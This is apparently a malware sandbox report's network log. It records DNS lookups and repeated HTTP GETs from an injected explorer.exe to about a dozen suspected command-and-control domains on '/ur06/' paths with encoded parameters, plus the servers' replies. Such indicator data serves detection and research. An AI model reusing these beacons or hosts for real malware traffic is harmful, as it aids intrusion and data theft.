                                                                      Jan 13, 2021 21:41:37.322856903 CET8.8.8.8192.168.2.40x3889No error (0)animaliaartist.com67.205.105.239A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:38.364562988 CET8.8.8.8192.168.2.40x337eNo error (0)www.profille-sarina23tammara.club198.54.117.244A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:41:43.830523014 CET8.8.8.8192.168.2.40xd6f9No error (0)www.restaurantsilhouette.comrestaurantsilhouette.comCNAME (Canonical name)IN (0x0001)
                                                                      Jan 13, 2021 21:41:43.830523014 CET8.8.8.8192.168.2.40xd6f9No error (0)restaurantsilhouette.com34.102.136.180A (IP address)IN (0x0001)
                                                                      Jan 13, 2021 21:42:10.354531050 CET8.8.8.8192.168.2.40x6234Name error (3)www.nipseythegreat.comnonenoneA (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.bimetalthermostatksd.com
                                                                      • www.straightlineautoserviceerie.net
                                                                      • www.cmoorestudio.com
                                                                      • www.eldritchparadox.com
                                                                      • www.maconanimalexterminator.com
                                                                      • www.pelisplusxd.net
                                                                      • www.allismd.com
                                                                      • www.central-car-sales.com
                                                                      • www.nolarapper.com
                                                                      • www.promanconsortium.com
                                                                      • www.profille-sarina23tammara.club
                                                                      • www.restaurantsilhouette.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.44975952.116.52.2580C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:01.588515997 CET1203OUTGET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1
                                                                      Host: www.bimetalthermostatksd.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:01.747785091 CET1211INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx
                                                                      Date: Wed, 13 Jan 2021 20:40:01 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: https://www.bimetalthermostatksd.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2
                                                                      X-Cache-CFC: -
                                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449762104.18.45.6080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:06.887569904 CET1331OUTGET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1
                                                                      Host: www.straightlineautoserviceerie.net
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:07.314032078 CET1332INHTTP/1.1 403 forbidden
                                                                      Date: Wed, 13 Jan 2021 20:40:07 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: __cfduid=dd0f9a9aa8e253d8c19b87cf8fff517111610570406; expires=Fri, 12-Feb-21 20:40:06 GMT; path=/; domain=.straightlineautoserviceerie.net; HttpOnly; SameSite=Lax
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 079f13340d000041075f803000000001
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Fbhd0pgrK43lX9YqfuIqQZxthUNI6EY439v6Jfr8mjdryX8RBjEmP6KaG2XY2dAA1XLq6kfIdLTZLqVVJ78JYS5DXI68UiE4%2B4ziBG61wvNitggk9pFgSocgHDWzgkru4%2B3IjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 6111ee3348824107-PRG
                                                                      Data Raw: 64 0d 0a 34 30 33 20 46 4f 52 42 49 44 44 45 4e 0d 0a
                                                                      Data Ascii: d403 FORBIDDEN


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      10192.168.2.449780198.54.117.24480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:41:38.560393095 CET5709OUTGET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1
                                                                      Host: www.profille-sarina23tammara.club
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      11192.168.2.44978134.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:41:43.872421026 CET5710OUTGET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1
                                                                      Host: www.restaurantsilhouette.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:41:44.011373997 CET5711INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 13 Jan 2021 20:41:43 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5ffc8396-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      12192.168.2.44978252.116.52.2580C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:41:49.177076101 CET5711OUTGET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1
                                                                      Host: www.bimetalthermostatksd.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:41:49.335088968 CET5712INHTTP/1.1 301 Moved Permanently
                                                                      Server: nginx
                                                                      Date: Wed, 13 Jan 2021 20:41:49 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: https://www.bimetalthermostatksd.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2
                                                                      X-Cache-CFC: -
                                                                      Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      13192.168.2.449783104.18.45.6080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:41:54.395767927 CET5713OUTGET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1
                                                                      Host: www.straightlineautoserviceerie.net
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:41:54.788088083 CET5714INHTTP/1.1 403 forbidden
                                                                      Date: Wed, 13 Jan 2021 20:41:54 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: __cfduid=dfd0fab4e196dd824a52ac4718c5a73f91610570514; expires=Fri, 12-Feb-21 20:41:54 GMT; path=/; domain=.straightlineautoserviceerie.net; HttpOnly; SameSite=Lax
                                                                      Vary: Accept-Encoding
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 079f14d8000000412b4009d000000001
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=AsIo%2B%2BFqy3sjPwf5iLcgi8tRFsAvxWH2b7f4SMt2J3T0SahZ975EaXcTQbTZy4NHbLEAUCJ3iFG0vpMe80oK1QRSMPMDjDpTKXx4wEZEeephFgF1lx4Tivn2sC9vVD22GfrcWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 6111f0d33ef1412b-PRG
                                                                      Data Raw: 64 0d 0a 34 30 33 20 46 4f 52 42 49 44 44 45 4e 0d 0a
                                                                      Data Ascii: d403 FORBIDDEN


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      14192.168.2.44978434.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:41:59.841177940 CET5714OUTGET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1
                                                                      Host: www.cmoorestudio.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:41:59.979943991 CET5715INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 13 Jan 2021 20:41:59 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5ffc83a1-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      15192.168.2.44978566.96.147.11280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:42:05.114039898 CET5715OUTGET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1
                                                                      Host: www.eldritchparadox.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:42:05.247495890 CET5717INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 13 Jan 2021 20:42:05 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.44976834.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:12.435581923 CET5672OUTGET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1
                                                                      Host: www.cmoorestudio.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:14.786267042 CET5676INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 13 Jan 2021 20:40:12 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "5ffc838f-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.44977066.96.147.11280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:18.268443108 CET5686OUTGET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1
                                                                      Host: www.eldritchparadox.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:18.403419018 CET5688INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 13 Jan 2021 20:40:18 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 867
                                                                      Connection: close
                                                                      Server: Apache/2
                                                                      Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                      Accept-Ranges: bytes
                                                                      Accept-Ranges: bytes
                                                                      Age: 0
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.449771107.180.50.16280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Jan 13, 2021 21:40:28.708831072 CET5689OUTGET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1
                                                                      Host: www.maconanimalexterminator.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Jan 13, 2021 21:40:28.856754065 CET5689INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 13 Jan 2021 20:40:28 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
